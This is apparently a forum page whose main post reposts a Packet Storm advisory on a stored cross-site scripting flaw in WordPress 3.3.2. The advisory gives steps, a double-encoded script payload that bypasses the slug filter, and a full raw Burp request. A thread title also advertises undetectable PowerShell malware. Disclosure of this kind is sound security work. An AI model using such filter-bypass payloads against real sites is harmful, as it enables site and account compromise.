    Windows 7, powerful malware, "open-source", Fully UnDetectable: PowerShell
  24. Nytro
    WordPress 3.3.2 Cross Site Scripting Authored by old man WordPress version 3.3.2 suffers from double-encoding cross site scripting vulnerability that bypasses the filter for protection. There is a persistent XSS vulnerability in the wordpress version 3.3.2. However, the severity of this finding is very LOW. The detail is as follow, a) Login into an admin account Navigate to Links -> Links Categories c) Fill up the required details and intercept the request with a BURP suite. d) The injectable parameter is slug. If you inject <script>alert(1)</script> as a value to parameter "slug", the application strips it off and the value becomes alert1. But if the payload is double encode then ;-) <script>alert(1)</script> when converted to %253cscript%253ealert%25281%2529%253c%252fscript%253e bypasses xss protection. The following request shows the raw burp request along with the vulnerable parameter and payload marked in bold. BURP REQUEST POST /wordpress/wp-admin/edit-tags.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://localhost/wordpress/wp-admin/edit-tags.php?action=edit&taxonomy=link_category&tag_ID=2&post_type=post Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1335544051%7C197b22093eaefaf6950bd81d6aa6372b; wp-settings-time-1=1335371272; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1335544051%7C6ebcb9d0104a37c6d7a91274ac94c6cb Content-Type: application/x-www-form-urlencoded Content-Length: 379 action=editedtag&tag_ID=2&taxonomy=link_category&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit-tags.php%3Ftaxonomy%3Dlink_category&_wpnonce=83974d7f8f&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fedit-tags.php%3Faction%3Dedit%26taxonomy%3Dlink_category%26tag_ID%3D2%26post_type%3Dpost&name=Blogroll&slug=injecthere%253cscript%253ealert%25281%2529%253c%252fscript%253e&description=sectest&submit=Update Sursa: WordPress 3.3.2 Cross Site Scripting ? Packet Storm
  25. Nytro
    De ce am impresia ca era o porcarie?
×
×
  • Create New...